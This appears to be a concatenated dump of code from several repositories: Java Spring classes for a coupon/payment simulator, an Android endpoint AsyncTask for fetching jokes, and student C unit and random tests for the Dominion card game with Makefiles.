* @return partnerCompUserID the partner company user ID
*/
public final String getPartnerCompUserID() {
return partnerCompUserID;
}
/**
* Sets the partner company user ID.
*
* @param partnerCompUserID
* the partner company user ID
*/
public final void setPartnerCompUserID(final String partnerCompUserID) {
this.partnerCompUserID = partnerCompUserID;
}
/**
* Gets the remaining coupon use count.
*
* @return couponRemainUseNum the remaining coupon use count
*/
public final String getCouponRemainUseNum() {
return couponRemainUseNum;
}
/**
* Sets the remaining coupon use count.
*
* @param couponRemainUseNum
* the remaining coupon use count
*/
public final void setCouponRemainUseNum(final String couponRemainUseNum) {
this.couponRemainUseNum = couponRemainUseNum;
}
/**
* Returns a string representation of this object.
*
* @return the string representation of this object
*/
@Override
public String toString() {
StringBuilder builder = new StringBuilder();
builder.append("[");
builder.append("transactionID=");
builder.append(getTransactionID());
builder.append(",campaignUseDatetime=");
builder.append(getCampaignUseDatetime());
builder.append(",transactionKingk=");
builder.append(getTransactionKingk());
builder.append(",afterDiscountKingk=");
builder.append(getAfterDiscountKingk());
builder.append(",discountKingk=");
builder.append(getDiscountKingk());
builder.append(",couponRemainUseNum=");
builder.append(getCouponRemainUseNum());
builder.append("]");
return builder.toString();
}
}
<file_sep>/*
* File name       ResponseTeleIF43Dto.java
* System          Next-generation payment system full-scale support (online)
* Copyright       Copyright(C) 2018 NTT DATA CORPORATION
* Company         NJK
* Created         2018/03/16
* Author          NJK 戦彦鵬
* Revision history
*     2018/03/16 NJK 戦彦鵬 Initial version
*/
package com.simulator.telegram.if44;
import com.simulator.telegram.ResponseTeleHeaderDto;
/**
* IF43 transaction list inquiry response DTO.
*
* @author NJK
* @version 1.0 2018/03/16
*/
public class ResponseTeleIF43Dto extends ResponseTeleHeaderDto {
/**
* Serial version UID.
*/
private static final long serialVersionUID = -2362745027504986682L;
/**
* Error message.
*/
private String errorMessage = "";
/**
* Data part.
*/
private TeleIF43DataDto data = null;
/**
* Gets the error message.
*
* @return errorMessage the error message
*/
public final String getErrorMessage() {
return errorMessage;
}
/**
* Sets the error message.
*
* @param errorMessage
* the error message
*/
public final void setErrorMessage(final String errorMessage) {
this.errorMessage = errorMessage;
}
/**
* Gets the data.
*
* @return data the data
*/
public TeleIF43DataDto getData() {
return data;
}
/**
* Sets the data part.
*
* @param data
* the data part
*/
public void setData(TeleIF43DataDto data) {
this.data = data;
}
/**
* オブジェクトの文字列表現を返す.
*
* @return オブジェクトの文字列表現
*/
@Override
public String toString() {
StringBuilder builder = new StringBuilder();
builder.append("[");
builder.append("data=");
builder.append(getData()); // append(Object) handles a null data part safely
builder.append(",time=");
builder.append(getTime());
builder.append(",resultCode=");
builder.append(getResultCode());
builder.append(",errorCode=");
builder.append(getErrorCode());
builder.append(",errorMessage=");
builder.append(getErrorMessage());
builder.append("]");
return builder.toString();
}
}
<file_sep>package com.simulator.webservice.controller.couponconfirm;
import java.util.ArrayList;
import java.util.Collections;
import java.util.HashMap;
import java.util.LinkedHashMap;
import java.util.List;
import java.util.Map;
import org.springframework.beans.BeanUtils;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.stereotype.Controller;
import org.springframework.ui.Model;
import org.springframework.web.bind.annotation.DeleteMapping;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.ModelAttribute;
import org.springframework.web.bind.annotation.PathVariable;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.PutMapping;
import org.springframework.web.bind.annotation.RequestMapping;
import com.simulator.dataservice.Service.CouponInfoService;
import com.simulator.dataservice.entity.CouponInfoEntity;
@Controller
@RequestMapping("/coupons")
public class CouponConfirmController {
@Autowired
private CouponInfoService couponInfoService;
/**
* Items used to display the incentive offer method selection
*/
final static Map<String, String> SELECT_Offer_Type = Collections
.unmodifiableMap(new LinkedHashMap<String, String>() {
/**
*
*/
private static final long serialVersionUID = 1L;
{
put("0(割引)", "0");
put("1(キャッシュバック)", "1");
put("2(ギフト)", "2");
}
});
/**
* Items used to display the incentive offer method
*/
final static Map<String, String> DISPLAY_Offer_Type = Collections
.unmodifiableMap(new LinkedHashMap<String, String>() {
/**
*
*/
private static final long serialVersionUID = 1L;
{
put("0", "0(割引)");
put("1", "1(キャッシュバック)");
put("2", "2(ギフト)");
}
});
/**
* Items used to display the amount input control selection
*/
final static Map<String, String> SELECT_kingkExistFlg = Collections
.unmodifiableMap(new LinkedHashMap<String, String>() {
/**
*
*/
private static final long serialVersionUID = 1L;
{
put("0(なし)", "0");
put("1(あり)", "1");
}
});
/**
* Items used to display the amount input control
*/
final static Map<String, String> DISPLAY_kingkExistFlg = Collections
.unmodifiableMap(new LinkedHashMap<String, String>() {
/**
*
*/
private static final long serialVersionUID = 1L;
{
put("0", "0(なし)");
put("1", "1(あり)");
}
});
/**
* Items used to display the transaction category selection
*/
final static Map<String, String> SELECT_REGIST_CANCEL_DIVISION = Collections
.unmodifiableMap(new LinkedHashMap<String, String>() {
/**
*
*/
private static final long serialVersionUID = 1L;
{
put("1:利用", "1");
put("3:失敗", "3");
put("4:未達", "4");
}
});
/**
* Items used to display the transaction category
*/
final static Map<String, String> DISPLAY_REGIST_CANCEL_DIVISION = Collections
.unmodifiableMap(new LinkedHashMap<String, String>() {
/**
*
*/
private static final long serialVersionUID = 1L;
{
put("1", "1:利用");
put("3", "3:失敗");
put("4", "4:未達");
}
});
private final Map<String, String> kingkExistFlgStr = new HashMap<String, String>() {
private static final long serialVersionUID = 8161703100044204711L;
{
put("0", "0(なし)");
put("1", "1(あり)");
}
};
@GetMapping
public String index(Model model) {
List<CouponInfoEntity> info = couponInfoService.findAll();
List<CouponInfoDto> screenList = new ArrayList<CouponInfoDto>();
for (CouponInfoEntity couponInfoEntity : info) {
CouponInfoDto screenInfo = new CouponInfoDto();
BeanUtils.copyProperties(couponInfoEntity, screenInfo);
screenInfo.setKingkExistFlg(kingkExistFlgStr.get(screenInfo.getKingkExistFlg()));
screenInfo.setIncentiveOfferType(DISPLAY_Offer_Type.get(screenInfo.getIncentiveOfferType()));
screenList.add(screenInfo);
}
model.addAttribute("couponInfo", screenList);
return "coupons/couponsInfo";
}
@GetMapping("new")
public String newCoupon(Model model) {
model.addAttribute("selectItems", SELECT_Offer_Type);
model.addAttribute("selectKingkItems", SELECT_kingkExistFlg);
model.addAttribute("selectTradeItems", SELECT_REGIST_CANCEL_DIVISION);
return "coupons/new";
}
@GetMapping("{partnerCompUserId}/edit")
public String edit(@PathVariable String partnerCompUserId, Model model) {
CouponInfoEntity couponInfo = couponInfoService.findOne(partnerCompUserId);
model.addAttribute("couponInfo", couponInfo);
model.addAttribute("selectItems", SELECT_Offer_Type);
model.addAttribute("selectKingkItems", SELECT_kingkExistFlg);
model.addAttribute("selectTradeItems", SELECT_REGIST_CANCEL_DIVISION);
return "coupons/edit";
}
@GetMapping("{partnerCompUserId}")
public String show(@PathVariable String partnerCompUserId, Model model) {
CouponInfoEntity couponInfo = couponInfoService.findOne(partnerCompUserId);
couponInfo.setIncentiveOfferType(DISPLAY_Offer_Type.get(couponInfo.getIncentiveOfferType()));
couponInfo.setKingkExistFlg(DISPLAY_kingkExistFlg.get(couponInfo.getKingkExistFlg()));
couponInfo.setRegistCancelDivision(DISPLAY_REGIST_CANCEL_DIVISION.get(couponInfo.getRegistCancelDivision()));
model.addAttribute("couponInfo", couponInfo);
return "coupons/show";
}
@PostMapping
public String create(@ModelAttribute CouponInfoEntity couponInfoMapEntity) {
couponInfoService.insertByValu(couponInfoMapEntity);
return "redirect:/coupons"; // ⑦
}
@PutMapping("{partnerCompUserId}")
public String update(@PathVariable String partnerCompUserId, @ModelAttribute CouponInfoEntity couponInfoEntity) {
couponInfoEntity.setPartnerCompUserId(partnerCompUserId);
couponInfoService.save(couponInfoEntity);
return "redirect:/coupons";
}
@DeleteMapping("{partnerCompUserId}")
public String destroy(@PathVariable String partnerCompUserId) {
couponInfoService.delete(partnerCompUserId);
return "redirect:/coupons";
}
}
<file_sep>/*
* WEBサービスの制御CONTROLパッケージ.
*/
package com.simulator.webservice.controller;<file_sep>package com.simulator.dataservice.mapper;
import com.simulator.dataservice.entity.LoginMngmtEntity;
public interface LoginMngmtMapper {
void updateLoginPassByPK(LoginMngmtEntity loginMngmtEntity);
void insertValu(LoginMngmtEntity loginMngmtEntity);
}
<file_sep>package com.simulator.webservice.controller.userconfirm;
import java.sql.Timestamp;
import lombok.Getter;
import lombok.Setter;
@Getter
@Setter
public class LoginMngmtDto {
/** Terminal login ID. */
private String terminalLoginId;
/** Business operator name. */
private String companyName;
/** Building name. */
private String buildingName;
/** Store name. */
private String storeName;
/** Login password. */
private String loginPass;
/** Expiration date. */
private Timestamp expDate;
/** Expiration date for screen display. */
private String displayExpDate;
/** Partner user ID start position. */
private Integer partnerUserIdStrat;
/** Partner user ID end position. */
private Integer partnerUserIdEnd;
/** Login control. */
private String loginControl;
/** Password update control. */
private String updateControl;
/** Usage confirmation control. */
private String confirmControl;
/** Coupon redemption control (without redemption). */
private String useOffControl;
/** Coupon redemption control (with redemption). */
private String useOnControl;
/** Transaction list inquiry control. */
private String rusultControl;
/** Cancellation control. */
private String cancelControl;
/** Detail inquiry control. */
private String detailControl;
}
<file_sep>package com.simulator.http.filter;
import java.io.IOException;
import javax.servlet.Filter;
import javax.servlet.FilterChain;
import javax.servlet.FilterConfig;
import javax.servlet.ServletException;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import javax.servlet.http.HttpServletRequest;
import org.slf4j.MDC;
import org.springframework.stereotype.Component;
@Component
public class LoggingFilter implements Filter {
@Override
public void init(FilterConfig filterConfig) throws ServletException {
}
@Override
public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain)
throws IOException, ServletException {
WrappedHttpServletRequest requestWrapper = null;
if (servletRequest instanceof HttpServletRequest) {
HttpServletRequest httpServletRequest =
(HttpServletRequest) servletRequest;
if ("POST".equals(
httpServletRequest.getMethod().toUpperCase())) {
requestWrapper = new WrappedHttpServletRequest(
httpServletRequest);
MDC.put("postData", requestWrapper.getRequestParams());
}
}
if (requestWrapper == null) {
filterChain.doFilter(
servletRequest, servletResponse);
} else {
filterChain.doFilter(
requestWrapper, servletResponse);
}
}
@Override
public void destroy() {
}
}<file_sep>package com.simulator.webservice.controller;
import java.util.ArrayList;
import java.util.List;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.stereotype.Controller;
import org.springframework.ui.Model;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.ModelAttribute;
import org.springframework.web.bind.annotation.PathVariable;
import org.springframework.web.bind.annotation.PutMapping;
import org.springframework.web.bind.annotation.RequestMapping;
import com.simulator.dataservice.Service.CouponInfoService;
import com.simulator.dataservice.entity.CouponInfoEntity;
import com.simulator.webservice.controller.from.ResetInfoFrom;
@Controller
@RequestMapping("/")
public class IndexController {
@Autowired
private CouponInfoService couponInfoService;
@GetMapping
public String index(Model model) {
List<CouponInfoEntity> info = couponInfoService.findAll();
ArrayList<String> couponList = new ArrayList<String>();
for (CouponInfoEntity couponInfoEntity : info) {
couponList.add(couponInfoEntity.getPartnerCompUserId());
}
CouponInfoEntity infoEntity = new CouponInfoEntity();
infoEntity.setPartnerCompUserId(null);
model.addAttribute("resetInfo", infoEntity);
model.addAttribute("displayList", couponList);
return "index";
}
@PutMapping("{partnerCompUserId}")
public String update(@PathVariable String partnerCompUserId, @ModelAttribute ResetInfoFrom resetInfoFrom) {
String userId = resetInfoFrom.getPartnerCompUserId().substring(1);
CouponInfoEntity updateInfo = couponInfoService.findOne(userId);
if (resetInfoFrom.getBalance() != null) {
updateInfo.setBalance(updateInfo.getBalance() + resetInfoFrom.getBalance());
}
if (resetInfoFrom.getCouponRemainUseNum() != null) {
updateInfo.setCouponRemainUseNum(updateInfo.getCouponRemainUseNum() + resetInfoFrom.getCouponRemainUseNum());
}
couponInfoService.save(updateInfo);
return "redirect:/";
}
@PutMapping("reset")
public String reset(@ModelAttribute ResetInfoFrom resetInfoFrom) {
List<CouponInfoEntity> wkResetInfo = couponInfoService.findAll();
List<CouponInfoEntity> resetInfo = new ArrayList<CouponInfoEntity>();
for (CouponInfoEntity couponInfoEntity : wkResetInfo) {
if (resetInfoFrom.getBalance() != null) {
couponInfoEntity.setBalance(resetInfoFrom.getBalance());
}
if (resetInfoFrom.getCouponRemainUseNum() != null) {
couponInfoEntity.setCouponRemainUseNum(resetInfoFrom.getCouponRemainUseNum());
}
resetInfo.add(couponInfoEntity);
}
couponInfoService.saveAll(resetInfo);
return "redirect:/";
}
}
<file_sep>package com.simulator.http;
import org.aspectj.lang.ProceedingJoinPoint;
import org.aspectj.lang.annotation.Around;
import org.aspectj.lang.annotation.Aspect;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.springframework.stereotype.Component;
import org.springframework.util.StopWatch;
@Component
@Aspect
public class ProcessingTimeLoggingAspect {
private static final Logger logger = LoggerFactory.getLogger(ProcessingTimeLoggingAspect.class);
@Around("@within(org.springframework.web.bind.annotation.RestController)")
public Object logging(ProceedingJoinPoint pjp) throws Throwable {
StopWatch stopWatch = new StopWatch();
stopWatch.start();
Object returnObject;
try {
returnObject = pjp.proceed();
} finally {
stopWatch.stop();
logger.info("{} : {} ms", pjp.getSignature(), stopWatch.getTotalTimeMillis());
}
return returnObject;
}
}<file_sep>package com.simulator.dataservice.Service;
import java.util.List;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.stereotype.Service;
import org.springframework.transaction.annotation.Transactional;
import com.simulator.dataservice.entity.LoginMngmtEntity;
import com.simulator.dataservice.mapper.LoginMngmtMapper;
import com.simulator.dataservice.repository.LoginMngmtRepository;
@Service
public class LoginMngmtService {
@Autowired
private LoginMngmtMapper loginMngmtMapper;
@Autowired
private LoginMngmtRepository loginMngmtRepository;
/** Updates the login password. */
@Transactional
public void updateLoginPassByPK(LoginMngmtEntity loginMngmtBean) {
loginMngmtMapper.updateLoginPassByPK(loginMngmtBean);
}
public List<LoginMngmtEntity> findAll() {
return loginMngmtRepository.findAll();
}
public LoginMngmtEntity selectByPk(String terminalLoginId) {
return loginMngmtRepository.findByTerminalLoginId(terminalLoginId);
}
@Transactional
public void save(LoginMngmtEntity loginMngmtEntity) {
loginMngmtRepository.save(loginMngmtEntity);
}
public LoginMngmtEntity findByPk(String terminalLoginId) {
return loginMngmtRepository.findByTerminalLoginId(terminalLoginId);
}
public LoginMngmtEntity getOne(String terminalLoginId) {
return loginMngmtRepository.getOne(terminalLoginId);
}
@Transactional
public void delete(String terminalLoginId) {
loginMngmtRepository.deleteById(terminalLoginId);
}
@Transactional
public void insertValu(LoginMngmtEntity loginMngmtMapEntity) {
loginMngmtMapper.insertValu(loginMngmtMapEntity);
}
}
|
6922f75cb7fba3e1da7bad864fed3b8bb1d5039a
|
[
"Java"
] | 23 |
Java
|
zerokim123/SimulatorRepository
|
a7869a68d10a8dbd9d3f1846b03b4cd75595a2f5
|
25fd8858ad8c278f81f23acde8985190c97126de
|
refs/heads/master
|
<repo_name>StarkAndroid/FinalProject2<file_sep>/app/src/main/java/com/udacity/gradle/builditbigger/EndpointsAsyncTask.java
package com.udacity.gradle.builditbigger;
import android.content.Context;
import android.content.Intent;
import android.os.AsyncTask;
import android.util.Log;
import android.util.Pair;
import android.widget.Toast;
import com.example.jokeandroidlibrary.JokeAndroidActivity;
import com.google.api.client.extensions.android.http.AndroidHttp;
import com.google.api.client.extensions.android.json.AndroidJsonFactory;
import com.google.api.client.googleapis.services.AbstractGoogleClientRequest;
import com.google.api.client.googleapis.services.GoogleClientRequestInitializer;
import com.udacity.gradle.builditbigger.backend.myApi.MyApi;
import java.io.IOException;
public class EndpointsAsyncTask extends AsyncTask<Void, Void, String> {
private static MyApi myApiService = null;
Context context;
public EndpointsAsyncTask (Context context){
this.context = context.getApplicationContext();
}
@Override
protected void onPostExecute(String joke) {
Intent intent = new Intent(context, JokeAndroidActivity.class);
intent.putExtra("joke", joke);
context.startActivity(intent);
}
@Override
protected String doInBackground(Void... voids) {
if(myApiService == null) { // Only do this once
MyApi.Builder builder = new MyApi.Builder(AndroidHttp.newCompatibleTransport(),
new AndroidJsonFactory(), null)
.setRootUrl("http://10.0.2.2:8080/_ah/api/")
.setGoogleClientRequestInitializer(new GoogleClientRequestInitializer() {
@Override
public void initialize(AbstractGoogleClientRequest<?> abstractGoogleClientRequest) throws IOException {
abstractGoogleClientRequest.setDisableGZipContent(true);
}
});
// end options for devappserver
myApiService = builder.build();
}
try {
return myApiService.tellJoke().execute().getData();
} catch (IOException e) {
return e.getMessage();
}
}
}
|
c46e37bb3ea147e945009f8c3e748cf7467e147f
|
[
"Java"
] | 1 |
Java
|
StarkAndroid/FinalProject2
|
8d3fb98cfc91c16707d2b66e17547c927b443b6a
|
60abdd6ce61e124ea39d438276c81d58c1865b1f
|
refs/heads/master
|
<file_sep>/*
<NAME>
4/28/2018
CS 362
Testing Adventurer Card
*/
#include <stdlib.h>
#include <stdio.h>
#include "assert.h"
#include "dominion.h"
#include "rngs.h"
#include "unit.h"
#include <time.h>
#include <math.h>
void asserttrue(int statement); /* forward declaration; asserttrue is defined after main */
int main (int argc, char** argv) {
struct gameState state;
int players = 2;
int seed = 100;
int choice1 = 0; // not used for adventurer
int choice2 = 0; // not used for adventurer
int choice3 = 0; // not used for adventurer
int handPos = 0; // not used for adventurer
int bonus = 0; // not used for adventurer
int k[10] = {adventurer, gardens, embargo, village, minion, mine, cutpurse,
sea_hag, tribute, smithy};
printf("____________________________________________________\n");
printf("Testing adventurer card\n\n");
fflush(stdout);
// init game
initializeGame(players, k, seed, &state);
int handCountBefore = numHandCards(&state);
printf("\tplay adventurer successfully executes:\n");
fflush(stdout);
int played = (cardEffect(adventurer, choice1, choice2, choice3, &state, handPos, &bonus) == 0);
asserttrue(played);
int handCountAfter = numHandCards(&state);
printf("\tcorrect number of cards in hand:\n");
fflush(stdout);
printf("\t\tcards in hand before: %d", handCountBefore);
printf("\n\t\tcards in hand after: %d\n", handCountAfter);
//TODO: Implement treasure/coin counter to see if there
// is more treasure in hand after card is played.
// for (i = 0; i < state->handCount[player]; i++)
// {
// if (state->hand[player][i] == copper)
// {
// state->coins += 1;
// }
// else if (state->hand[player][i] == silver)
// {
// state->coins += 2;
// }
// else if (state->hand[player][i] == gold)
// {
// state->coins += 3;
// }
// }
asserttrue((handCountAfter - handCountBefore) == 2);
printf("____________________________________________________\n");
return 0;
}
// adding own asserttrue as recommended
void asserttrue(int statement) {
if (statement) {
printf("\t\tTEST SUCCESSFULLY COMPLETED\n");
fflush(stdout);
} else {
printf("\t\tTEST FAILED\n");
fflush(stdout);
}
}<file_sep>/*
<NAME>
4/28/2018
CS 362
This tests the cost of each card, ensuring it matches the amount specified by the rules of Dominion.
*/
#include <stdlib.h>
#include <stdio.h>
#include "assert.h"
#include "dominion.h"
#include "rngs.h"
#include "unit.h"
#include <time.h>
#include <math.h>
void testCard(int statement);
int main(int argc, char* argv[]) {
printf("____________________________________________________\n");
printf("Testing getCost function\n");
printf("curse cost:");
testCard(getCost(curse) == 0);
printf("estate cost:");
testCard(getCost(estate) == 2);
printf("duchy cost:");
testCard(getCost(duchy) == 5);
printf("province cost:");
testCard(getCost(province) == 8);
printf("copper cost:");
testCard(getCost(copper) == 0);
printf("silver cost:");
testCard(getCost(silver) == 3);
printf("gold cost:");
testCard(getCost(gold) == 6);
printf("adventurer cost:");
testCard(getCost(adventurer) == 6);
printf("council_room cost:");
testCard(getCost(council_room) == 5);
printf("feast cost:");
testCard(getCost(feast) == 4);
printf("gardens cost:");
testCard(getCost(gardens) == 4);
printf("mine cost:");
testCard(getCost(mine) == 5);
printf("remodel cost:");
testCard(getCost(remodel) == 4);
printf("smithy cost:");
testCard(getCost(smithy) == 4);
printf("village cost:");
testCard(getCost(village) == 3);
printf("baron cost:");
testCard(getCost(baron) == 4);
printf("great_hall cost:");
testCard(getCost(great_hall) == 3);
printf("minion cost:");
testCard(getCost(minion) == 5);
printf("steward cost:");
testCard(getCost(steward) == 3);
printf("tribute cost:");
testCard(getCost(tribute) == 5);
printf("ambassador cost:");
testCard(getCost(ambassador) == 3);
printf("cutpurse cost:");
testCard(getCost(cutpurse) == 4);
printf("embargo cost:");
testCard(getCost(embargo) == 2);
printf("outpost cost:");
testCard(getCost(outpost) == 5);
printf("salvager cost:");
testCard(getCost(salvager) == 4);
printf("sea_hag cost:");
testCard(getCost(sea_hag) == 4);
printf("treasure_map cost:");
testCard(getCost(treasure_map) == 4);
printf("other cost:");
testCard(getCost(treasure_map + 1) == -1);
printf("____________________________________________________\n");
return 0;
}
void testCard(int statement) {
if (statement) {
printf("\t\tTEST SUCCESSFULLY COMPLETED\n");
fflush(stdout);
} else {
printf("\t\tTEST FAILED\n");
fflush(stdout);
}
}<file_sep>/*
<NAME>
4/28/2018
CS 362
This is a unit test for the whoseTurn function. whoseTurn is an
int function that returns the index of the player whose turn it is.
*/
#include <stdlib.h>
#include <stdio.h>
#include "assert.h"
#include "dominion.h"
#include "rngs.h"
#include "unit.h"
#include <time.h>
#include <math.h>
int main(){
struct gameState state;
int turn = 0;
int s = 0;
int i=0;
for(i = 0; i < 15; i++){
state.whoseTurn = turn;
s = whoseTurn(&state);
assert(s == turn);
turn++;
}
printf("____________________________________________________\n\n");
printf("\n\tTesting whoseTurn function");
printf("\n\tThe test for whoseTurn PASSED \n");
printf("____________________________________________________\n\n");
return 0;
}<file_sep>/*
<NAME>
4/28/2018
CS 362
Testing village Card
*/
#include <stdlib.h>
#include <stdio.h>
#include "assert.h"
#include "dominion.h"
#include "rngs.h"
#include "unit.h"
#include <time.h>
#include <math.h>
void asserttrue(int statement);
int main(int argc, char** argv){
printf("____________________________________________________\n");
printf("Testing village card");
struct gameState state;
int choice1 = 0, choice2 = 0, choice3 = 0, handPos = 0, bonus = 0;
int k[10] = {adventurer, village, embargo, village, minion, mine, cutpurse,
sea_hag, steward, smithy};
initializeGame(2, k, 2, &state);
int handCountBefore = numHandCards(&state);
int played = (cardEffect(village, choice1, choice2, choice3, &state, handPos, &bonus) == 0);
printf("\n\tplay village successfully executes:\n");
asserttrue(played);
printf("\tcorrect number of actions:\n");
asserttrue(state.numActions == 2);
int handCountAfter = numHandCards(&state);
printf("\tcorrect number of cards in hand:\n");
fflush(stdout);
asserttrue((handCountBefore - handCountAfter) == 1);
printf("____________________________________________________\n");
return 0;
}
// adding own asserttrue as recommended
void asserttrue(int statement) {
if (statement) {
printf("\t\tTEST SUCCESSFULLY COMPLETED\n");
fflush(stdout);
} else {
printf("\t\tTEST FAILED\n");
fflush(stdout);
}
}<file_sep>/*
<NAME>
4/28/2018
CS 362
Testing buyCard()
*/
#include <stdlib.h>
#include <stdio.h>
#include "assert.h"
#include "dominion.h"
#include "rngs.h"
#include "unit.h"
#include <time.h>
#include <math.h>
void asserttrue(int statement); /* forward declaration; asserttrue is defined after main */
int main() {
struct gameState state;
int s;
int k[10] = {1, 2, 3, 4, 5, 6, 7, 8, 9, 10};
initializeGame(2, k, 2, &state);
printf("____________________________________________________\n\n");
printf("Testing buyCard().\n");
state.numBuys = 0;
s = buyCard(5, &state);
assert(s == -1);
state.numBuys = 5;
state.coins = 0;
s = buyCard(5, &state);
assert(s == -1);
state.coins = 100;
s = buyCard(5, &state);
asserttrue(s == 0);
printf("____________________________________________________\n\n");
return 0;
}
// adding own asserttrue as recommended
void asserttrue(int statement) {
if (statement) {
printf("\t\tTEST SUCCESSFULLY COMPLETED\n");
fflush(stdout);
} else {
printf("\t\tTEST FAILED\n");
fflush(stdout);
}
}<file_sep>/*
<NAME>
4/28/2018
CS 362
Testing Smithy Card
*/
#include "dominion.h"
#include "dominion_helpers.h"
#include "interface.h"
#include "rngs.h"
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#define NUM_TESTS 1000
// testing smithy card
int asserttrue(int statement);
int main(int argc, char* argv[]) {
time_t t;
// Intializes random number generator
srand((unsigned) time(&t));
int handSuccess = 0;
int deckSuccess = 0;
printf("____________________________________________________________________\n");
printf("Testing Smithy card\n\n");
fflush(stdout);
int i;
for (i = 0; i < NUM_TESTS; i++) {
struct gameState state;
int players = 2;
int seed = rand();
int choice1 = 0; // not used for smithy
int choice2 = 0; // not used for smithy
int choice3 = 0; // not used for smithy
int handPos = 0;
int bonus = 0; // not used for smithy
int k[10] = {adventurer, gardens, embargo, village, minion, mine, cutpurse,
sea_hag, tribute, smithy};
// init game
initializeGame(players, k, seed, &state);
int handCountBefore = numHandCards(&state);
int deckCountBefore = state.deckCount[0];
// int discardCountBefore = state.discardCount[0];
int played = (cardEffect(smithy, choice1, choice2, choice3, &state, handPos, &bonus) == 0);
asserttrue(played);
int handCountAfter = numHandCards(&state);
int deckCountAfter = state.deckCount[0];
// int discardCountAfter = state.discardCount[0];
// 2 because + 3 and we played 1.
handSuccess += asserttrue((handCountAfter - handCountBefore) == 2);
// 4 because we drew 3, would have to add for discard if
// that was being set - may be a bug for future investigation
deckSuccess += asserttrue((deckCountBefore - deckCountAfter) == 4);
}
// tallied results
printf("\tcorrect number of cards in hand: %d of %d times.\n", handSuccess, NUM_TESTS);
fflush(stdout);
printf("\tcorrect number of cards in deck: %d of %d times.\n", deckSuccess, NUM_TESTS);
fflush(stdout);
printf("____________________________________________________________________\n");
return 0;
}
// adding own asserttrue as recommended
int asserttrue(int statement) {
if (statement) {
return TRUE;
} else {
return FALSE;
}
}<file_sep>
CFLAGS = -Wall -fpic -coverage -lm
testme: testme.c
gcc -o testme testme.c $(CFLAGS)
all: testme
default: testme
clean:
rm -f *.o testme *.gcov *.gcda *.gcno *.so *.out <file_sep>/*
<NAME>
4/28/2018
CS 362
Testing smithy Card
*/
#include <stdlib.h>
#include <stdio.h>
#include "assert.h"
#include "dominion.h"
#include "rngs.h"
#include "unit.h"
#include <time.h>
#include <math.h>
void asserttrue(int statement);
int main(int argc, char** argv){
printf("____________________________________________________\n");
printf("Testing smithy card");
struct gameState state;
int choice1 = 0, choice2 = 0, choice3 = 0, handPos=0, bonus=0;
int temp;
int k[10] = {adventurer, gardens, embargo, village, minion, mine, cutpurse,
sea_hag, tribute, smithy};
initializeGame(2, k, 2, &state);
temp = numHandCards(&state);
int played = (cardEffect(smithy, choice1, choice2, choice3, &state, handPos, &bonus) == 0);
printf("\n\tplay smithy successfully executes:\n");
asserttrue(played);
// smithy draws 3 cards and discards itself, so the hand should grow by 2
printf("\tcorrect number of cards in hand:\n");
asserttrue(numHandCards(&state) == temp + 2);
printf("____________________________________________________\n");
return 0;
}
// adding own asserttrue as recommended
void asserttrue(int statement) {
if (statement) {
printf("\t\tTEST SUCCESSFULLY COMPLETED\n");
fflush(stdout);
} else {
printf("\t\tTEST FAILED\n");
fflush(stdout);
}
}<file_sep> <NAME>
wrighch3
<file_sep>default: test
./test
test: testme.c
gcc -o test testme.c
clean:
rm -f ./test<file_sep>/*
<NAME>
4/28/2018
CS 362
Testing Embargo Card
*/
#include "dominion.h"
#include "dominion_helpers.h"
#include "interface.h"
#include "rngs.h"
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#define NUM_TESTS 1000
int asserttrue(int statement);
int main(int argc, char* argv[]) {
time_t t;
// Intializes random number generator
srand((unsigned) time(&t));
int execSuccess = 0;
int tokenSuccess = 0;
int cardSuccess = 0;
int coinSuccess = 0;
printf("____________________________________________________________________\n");
printf("Testing Embargo\n\n");
fflush(stdout);
int i;
for (i = 0; i < NUM_TESTS; i++) {
struct gameState state;
int players = 2;
int seed = rand();
int choice1 = rand() % (treasure_map + 2);
int choice2 = 0; // not used for embargo
int choice3 = 0; // not used for embargo
int handPos = 0;
int bonus = 0; // not used for embargo
int k[10] = {adventurer, gardens, embargo, village, minion, mine, cutpurse,
sea_hag, tribute, smithy};
initializeGame(players, k, seed, &state);
int embargoCountBefore = state.embargoTokens[choice1];
int handCountBefore = numHandCards(&state);
int coinCountBefore = state.coins;
int played = (cardEffect(embargo, choice1, choice2, choice3, &state, handPos, &bonus) == 0);
execSuccess += asserttrue(played);
int embargoCountAfter = state.embargoTokens[choice1];
int handCountAfter = numHandCards(&state);
int coinCountAfter = state.coins;
tokenSuccess += asserttrue((embargoCountAfter - embargoCountBefore) == 1);
cardSuccess += asserttrue((handCountBefore - handCountAfter) == 1);
coinSuccess += asserttrue((coinCountAfter - coinCountBefore) == 2);
}
// tallied results
printf("\tplay embargo successfully executes: %d of %d times.\n", execSuccess, NUM_TESTS);
fflush(stdout);
printf("\tcorrect number of embargo tokens: %d of %d times.\n", tokenSuccess, NUM_TESTS);
fflush(stdout);
printf("\tcorrect number of cards in hand: %d of %d times.\n", cardSuccess, NUM_TESTS);
fflush(stdout);
printf("\tcorrect number of coins: %d of %d times.\n", coinSuccess, NUM_TESTS);
fflush(stdout);
printf("____________________________________________________________________\n");
return 0;
}
// adding own asserttrue as recommended
int asserttrue(int statement) {
if (statement) {
return TRUE;
} else {
return FALSE;
}
}<file_sep>/*
<NAME>
4/28/2018
CS 362
Unit test for the isGameOver() function
*/
#include <stdlib.h>
#include <stdio.h>
#include "assert.h"
#include "dominion.h"
#include "rngs.h"
#include "unit.h"
#include <time.h>
int main(){
struct gameState state;
int s;
int k[10] ={1,2,3,4,5,6,7,8,9,10};
initializeGame(2,k,2,&state);
state.supplyCount[province]=0;
s=isGameOver(&state);
assert(s==1);
printf("____________________________________________________\n\n");
printf("Testing isGameOver function");
printf("isGameOver has passed, province is at 0, the game is over\n");
state.supplyCount[1] = 0;
state.supplyCount[4] = 0;
state.supplyCount[7] = 0;
s = isGameOver(&state);
assert(s == 1);
printf("The game is over, 3 piles of cards are empty.\n");
printf("____________________________________________________\n");
return 0;
}<file_sep>/*
<NAME>
4/28/2018
CS 362
